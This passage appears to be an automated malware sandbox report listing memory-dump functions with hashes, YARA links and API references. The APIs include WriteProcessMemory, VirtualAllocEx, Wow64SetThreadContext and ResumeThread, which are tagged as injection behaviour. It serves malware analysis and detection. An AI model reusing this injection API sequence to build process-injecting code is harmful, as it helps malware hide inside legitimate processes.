Opcode ID: 32163d12394e1e4f825e1fe81f51a275a0696f83eeeb2dcf046c376ed7cd9414
Instruction ID: 52d77f425fb99319c532b61b522a2845d8872119c4f1dda4dd2509145f416298
Opcode Fuzzy Hash: 32163d12394e1e4f825e1fe81f51a275a0696f83eeeb2dcf046c376ed7cd9414
Instruction Fuzzy Hash: 5C8180B19083419FFB209FA49985B5EBBE0BB41308F55497DD6588B292E7B288448B93

Uniqueness

Uniqueness Score: -1.00%

Function 06114620 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 061146FB

Memory Dump Source

Source File: 00000000.00000002.1729691472.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6110000_file.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a8e1e8efde7002feca59683e7289f076b8286263c3c6da90874f2ff1ee2f6f37
Instruction ID: 695f8a10a42dcffc7fb2c13acd437c93ac0d2ce1484900ea24c1bcde03054a33
Opcode Fuzzy Hash: a8e1e8efde7002feca59683e7289f076b8286263c3c6da90874f2ff1ee2f6f37
Instruction Fuzzy Hash: C241A9B5D012589FCF10CFA9D984ADEFBF1BB49314F24902AE418BB210C734AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 06114628 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 061146FB

Memory Dump Source

Source File: 00000000.00000002.1729691472.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6110000_file.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 885ad627075b16e1f7f87dd618d09b289686742a99056a098d0441f6d5e5d5a4
Instruction ID: 72ad1097d1369190bc9fb34898bd8b2f7867001208ad4a786803cee72ba7a15d
Opcode Fuzzy Hash: 885ad627075b16e1f7f87dd618d09b289686742a99056a098d0441f6d5e5d5a4
Instruction Fuzzy Hash: 64419AB5D012589FCF00CFA9D984ADEFBF1BB49314F24942AE819BB210D735AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 06114779 Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06114832

Memory Dump Source

Source File: 00000000.00000002.1729691472.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6110000_file.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5e807fe7eab69368dd4526401ffd7ceb2a16fb8466c1d73d4b9bd351e98934dd
Instruction ID: 55dee9dece6742247185d5b52f614344e75b151c40a92d1d3599aefb9f08447e
Opcode Fuzzy Hash: 5e807fe7eab69368dd4526401ffd7ceb2a16fb8466c1d73d4b9bd351e98934dd
Instruction Fuzzy Hash: 8A41A9B5D00258DFCF10CFA9D984AEEFBB1BB59310F14A42AE814B7210C734A945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 06114780 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06114832

Memory Dump Source

Source File: 00000000.00000002.1729691472.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6110000_file.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f49b868f41fc7906402cee3d45198f7de4bb58d5ae502a8af62d5c09c2869ea8
Instruction ID: 8e9f2e4727ff114836d5114eb470c8ce292844febf82ef0d22933c8332e925f2
Opcode Fuzzy Hash: f49b868f41fc7906402cee3d45198f7de4bb58d5ae502a8af62d5c09c2869ea8
Instruction Fuzzy Hash: FC4199B5D04258DFCF10CFAAD984AEEFBB1BB49310F14942AE815B7210D735A945CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 06114500 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 061145B2

Memory Dump Source

Source File: 00000000.00000002.1729691472.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6110000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5abddfd65d7b8d869695e82d9d5f3a38faa2865e10f4fad2e3b39ca6a52f0181
Instruction ID: 5fca95ec11347ffa990e2b92903190d220915d82d17ca2a48ca0aae329e09110
Opcode Fuzzy Hash: 5abddfd65d7b8d869695e82d9d5f3a38faa2865e10f4fad2e3b39ca6a52f0181
Instruction Fuzzy Hash: 513176B9D00258DFCF10CFA9D980ADEFBB1BB49310F14942AE859BB210D735A946CF58

Uniqueness

Uniqueness Score: -1.00%

Function 06114508 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 061145B2

Memory Dump Source

Source File: 00000000.00000002.1729691472.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6110000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c377cc0e3ef936922e64d88ac07677d547b7333bcf4f346302515396c0b09666
Instruction ID: f19c1140b976766fef49937378de469c3cd09985fdfca0ec129b3099a69cf079
Opcode Fuzzy Hash: c377cc0e3ef936922e64d88ac07677d547b7333bcf4f346302515396c0b09666
Instruction Fuzzy Hash: 593178B9D04258DFCF10CFA9D984ADEFBB5BB49310F10942AE815BB210D735A945CF58

Uniqueness

Uniqueness Score: -1.00%

Function 061143D8 Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0611448F

Memory Dump Source

Source File: 00000000.00000002.1729691472.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6110000_file.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3cc3a6b464623bd7e1aa7cb7731e697c4fad5b449606529645ff715811f8c324
Instruction ID: c06f7a1b573c6586def6f72014dbbcf17c4f74fe78e16a0149db16bfeb9b0fcb
Opcode Fuzzy Hash: 3cc3a6b464623bd7e1aa7cb7731e697c4fad5b449606529645ff715811f8c324
Instruction Fuzzy Hash: 2E41CDB5D002589FCB10CFA9D984AEEFBF0BF49314F24802AE458BB200D738A985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 061143E0 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0611448F

Memory Dump Source

Source File: 00000000.00000002.1729691472.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6110000_file.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 03b96948f065cedca9ecc0915999e38417cd8b97975f48b11224f2e6aa879ef2
Instruction ID: f69f39305ea095efd31113c1bb8f2088c6e1ec18f110364413f8feb900099867
Opcode Fuzzy Hash: 03b96948f065cedca9ecc0915999e38417cd8b97975f48b11224f2e6aa879ef2
Instruction Fuzzy Hash: D131BEB5D002589FDB10CFA9D984ADEFBF0BF49314F24802AE418B7200D738A985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 6D077140 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

Part of subcall function 6D092820: _malloc.LIBCMT ref: 6D092871

std::tr1::_Xweak.LIBCPMT ref: 6D0771D2

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Xweak_mallocstd::tr1::_
String ID:
API String ID: 4085767713-0
Opcode ID: 638d2f19e59b9a183ee3672d58cdb6d3904dc3a233eb745c5e62b278ff01c9b2
Instruction ID: aec002690d7a1515b1f77cc422088943acab9e3299f5a475acf4e7f20902e508
Opcode Fuzzy Hash: 638d2f19e59b9a183ee3672d58cdb6d3904dc3a233eb745c5e62b278ff01c9b2
Instruction Fuzzy Hash: 333160B4A0474A9FDB20CFA9C880BABB7F9FF89204F10865DE8159B741D731E905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 061142E9 Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0611436E

Memory Dump Source

Source File: 00000000.00000002.1729691472.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6110000_file.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: fc9608341e12f6eb61435eecf007503ff2d1623494cb4ec201a957914b84414f
Instruction ID: c3da1308d5c76c9c05b4e3d8fa10e91ea9af3300f3bda99205aaf5ff24620393
Opcode Fuzzy Hash: fc9608341e12f6eb61435eecf007503ff2d1623494cb4ec201a957914b84414f
Instruction Fuzzy Hash: 2831C9B5D012189FCB14CFA9D980ADEFBF1BB49310F24942AE419B7310CB34A945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 061142F0 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0611436E

Memory Dump Source

Source File: 00000000.00000002.1729691472.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6110000_file.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 57afea9ec13dbfb8c26bddcd77b689bca35219579cd947f5e5954e8d14457750
Instruction ID: fe4c39b505e884d579a26cd0ac6f888e7eeaddf1ce22d5f495b6fa33cb28f30b
Opcode Fuzzy Hash: 57afea9ec13dbfb8c26bddcd77b689bca35219579cd947f5e5954e8d14457750
Instruction Fuzzy Hash: A731AAB4D012589FCB14CFA9D984ADEFBF4AB49320F14942AE819B7310CB34A941CF98

Uniqueness

Uniqueness Score: -1.00%

Function 6D0D25C3 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6D0CCB3E,6D0C9BD4,?,00000000,00000000,00000000,?,6D0CEA98,00000001,00000214), ref: 6D0D2606

Part of subcall function 6D0CD7D8: __getptd_noexit.LIBCMT ref: 6D0CD7D8

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: cd2af000bacdd4f9ece1796a9a46d2caf7f621d4a2e2125b4366440bc30157b4
Instruction ID: dafc4a515b5c49cb9d6f1ee0f9486112b1f1e96b9e5fd9e0655520c3355e6d04
Opcode Fuzzy Hash: cd2af000bacdd4f9ece1796a9a46d2caf7f621d4a2e2125b4366440bc30157b4
Instruction Fuzzy Hash: 9F01BC312093169BFB699E75CC24F6B33E9BF82764F11452EE8258B190DB70D8108790

Uniqueness

Uniqueness Score: -1.00%

Function 6D08EA40 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

SysAllocString.OLEAUT32 ref: 6D08EA8D

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 29d747d0b62fe9ddebe111d5dd2bd93a7aec21e2d521636624d95ce49408826b
Instruction ID: 967921d6ada18def6ce729931bd7d6e0a1dff27d83ee392075a51a3de6d1eb99
Opcode Fuzzy Hash: 29d747d0b62fe9ddebe111d5dd2bd93a7aec21e2d521636624d95ce49408826b
Instruction Fuzzy Hash: 2D0180B1804B66EBE710CF54C900BAAB7F8EB05B64F11436AED25E7380D7B5A900CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 6D0C9D21 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6D0CE8DC

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: H_prolog3_catch_malloc
String ID:
API String ID: 529455676-0
Opcode ID: bd197bb44432fea2b749aea3e9669852b054c1f73c6956f84c7f9f8fcc95d8ba
Instruction ID: af12313bc98ea3ba81636ef92eb100374b45ece2ddad83a765666295fdb87de7
Opcode Fuzzy Hash: bd197bb44432fea2b749aea3e9669852b054c1f73c6956f84c7f9f8fcc95d8ba
Instruction Fuzzy Hash: EDD0A73151C209E7EB41EBD8DA05B6D7BB4AB81326F914065F108BB2C0DF718E14875B

Uniqueness

Uniqueness Score: -1.00%

Function 6D0CA510 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

___security_init_cookie.LIBCMT ref: 6D0CA510

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ___security_init_cookie
String ID:
API String ID: 3657697845-0
Opcode ID: 27b748a9c275510458f0068f842967d98f7d0f67ac18c1338cd75791cb2cbf1f
Instruction ID: 815495e6cd711b074ebe1362ec78c04e4312bd8dc65a797c23119d9e37764b97
Opcode Fuzzy Hash: 27b748a9c275510458f0068f842967d98f7d0f67ac18c1338cd75791cb2cbf1f
Instruction Fuzzy Hash: 3BC09B351083089FDB04CF10F440D9E3715AB94224731D115FE18076509B319661D551

Uniqueness

Uniqueness Score: -1.00%

Function 0325BD39 Relevance: 1.4, Strings: 1, Instructions: 132COMMON

Download Yara Rule

Strings

pbq, xrefs: 0325BE5D

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: pbq
API String ID: 0-3896149868
Opcode ID: f9e3603e689284966aa0007297adccdabee439df5984be6116f1b6a152345d15
Instruction ID: 1fb7a7f0f6ac4be706e402d606369e5df898bd43db94c8480a1f466320736e5b
Opcode Fuzzy Hash: f9e3603e689284966aa0007297adccdabee439df5984be6116f1b6a152345d15
Instruction Fuzzy Hash: D741E430665342CFC705CF64C884EAEBBB6FF85310B18449AE5569B2B1C7B49E86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03259A59 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

d, xrefs: 03259BF7

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 8be26ae6c51e1c4ee9487d3b6d736597b3a5275de90e7596a74e606a00a0f27d
Instruction ID: a514698494fea8bcd77ce665fa7d778136e42e9d547291bab2b35da17f1665da
Opcode Fuzzy Hash: 8be26ae6c51e1c4ee9487d3b6d736597b3a5275de90e7596a74e606a00a0f27d
Instruction Fuzzy Hash: E3519174E10219CFDB14DFA9C5846ADFBF2FF88314F24852AD819AB254EB346986CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0325BD78 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

pbq, xrefs: 0325BE5D

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: pbq
API String ID: 0-3896149868
Opcode ID: 6bf6ce7a1eb28784022e2a8a12ebf5f06bde22b667da6b0d66cbc266c61bf9bb
Instruction ID: 46822666c8039ea79740d18505026cf1580b5d99a99485b50ea18f013f904e9d
Opcode Fuzzy Hash: 6bf6ce7a1eb28784022e2a8a12ebf5f06bde22b667da6b0d66cbc266c61bf9bb
Instruction Fuzzy Hash: 5C418E30A10206CFCB14DF69C484AAABBF6FF84314F148469E9568B365CB70ED86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0325BD68 Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

pbq, xrefs: 0325BE5D

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: pbq
API String ID: 0-3896149868
Opcode ID: 27a52149a82ba8412fb02e9a26e45665f04fb5589d307c4926282251dc02e7c1
Instruction ID: 60fa9aeba9def828a57040f7691abe6dd1ef98b3e64ca47e90aaf9513e5e3bb9
Opcode Fuzzy Hash: 27a52149a82ba8412fb02e9a26e45665f04fb5589d307c4926282251dc02e7c1
Instruction Fuzzy Hash: 66418131A10206CFC714CF68C584A6ABBB6FF85310F1885A9E9568B775CB70ED86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0325386F Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

Hbq, xrefs: 03253914

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: Hbq
API String ID: 0-1245868
Opcode ID: 0bd194328170b7519bfc1f0fe0fc88c342078fea16c8bbe9b7af70a9c4b4e711
Instruction ID: f64faec0234f69383e409196a359d974c68caf928fc2a58aa71241ab693cbee0
Opcode Fuzzy Hash: 0bd194328170b7519bfc1f0fe0fc88c342078fea16c8bbe9b7af70a9c4b4e711
Instruction Fuzzy Hash: A731F571A04344AFE705DF78CC05BAA3BB6FF86300F0084A5E641DB291DA349B4A8B51

Uniqueness

Uniqueness Score: -1.00%

Function 03253880 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

Hbq, xrefs: 03253914

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: Hbq
API String ID: 0-1245868
Opcode ID: 8e937cfc6f44ab459e8a86c0e184e02198cc7358184bd734cdb48c6464473faa
Instruction ID: 5972d7194a19ed2ad17d27b0e1c464222af4d47d9cc7f9d2f6cd019100b1902d
Opcode Fuzzy Hash: 8e937cfc6f44ab459e8a86c0e184e02198cc7358184bd734cdb48c6464473faa
Instruction Fuzzy Hash: 14212771A04344AFE745EF789C09BAE3BBAFF81340F1084A5E601DB280DA349F458B51

Uniqueness

Uniqueness Score: -1.00%

Function 032530A8 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

8bq, xrefs: 03253129

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: 7805a6c7bdd066552f8c5e735c4bcdb82d20005ea9a968f85a427c811102a0a0
Instruction ID: eb7e50df901b3fdfbd46e8fa82976eca5b2dc7815e6359451de57905ee052dc3
Opcode Fuzzy Hash: 7805a6c7bdd066552f8c5e735c4bcdb82d20005ea9a968f85a427c811102a0a0
Instruction Fuzzy Hash: 7521E474E0020ADFCB04DFA9D544AEEBBF1FB88300F149469E909B7264EB349A45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0325FAD1 Relevance: .4, Instructions: 397COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a477ddc2a8b82ab93894ed3ffa528040c695720eabff13ee97c280d6dbd505ec
Instruction ID: dfeef4da30be1fdbdf41ed114c1b0aea9c45bb0bbdab0e5c14fcbc5ac2931f84
Opcode Fuzzy Hash: a477ddc2a8b82ab93894ed3ffa528040c695720eabff13ee97c280d6dbd505ec
Instruction Fuzzy Hash: 60315C74A51209DFCB05CF64C5809ADBBB1FF89304B18859AE805AB356EB71AD46CF80

Uniqueness

Uniqueness Score: -1.00%

Function 03258F23 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8456e6cada954a223a297c74fdbd0b72fe2a067dd12db2218716bdd77809223
Instruction ID: b62537bd2a14e428e6ff6d15855e6c53e2ffb8b4c5d82c5c7cf050f9a28a5a80
Opcode Fuzzy Hash: e8456e6cada954a223a297c74fdbd0b72fe2a067dd12db2218716bdd77809223
Instruction Fuzzy Hash: 1C91B231E102259FCB18CF78C99856EBBF3BBC9610F298559EC15DB354DB309D828B91

Uniqueness

Uniqueness Score: -1.00%

Function 0325D5E0 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721278190.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3250000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6db03131cb3a3bd49bc476f20a21ebb57d32d11373cb7eba5a44e451894a8b9
Instruction ID: 0c0f46a576b446b403767a708223146b2481da144497c29f36456a92ab298d60
Opcode Fuzzy Hash: c6db03131cb3a3bd49bc476f20a21ebb57d32d11373cb7eba5a44e451894a8b9
Instruction Fuzzy Hash: 8851EF32524206DFCF16DF94D844CA9BB76FF48310B0684A4EA056F176C771FAAACB80

Uniqueness

Uniqueness Score: -1.00%

Function 060F1F98 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1729649396.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b8d44d7312389ec8c171220d35537c702812f5f7409040a48b121b0f13c9bb6
Instruction ID: 9defb444a435f7969a12f351d95e8dd85e3dbe27a2c67b558719b8c8a2e22008
Opcode Fuzzy Hash: 4b8d44d7312389ec8c171220d35537c702812f5f7409040a48b121b0f13c9bb6
Instruction Fuzzy Hash: 72713A35BA0104CFDB94CFA8C99096DBBF2FF8821071141A5EA06DB765DB71ED42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 060F1F4E Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1729649396.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
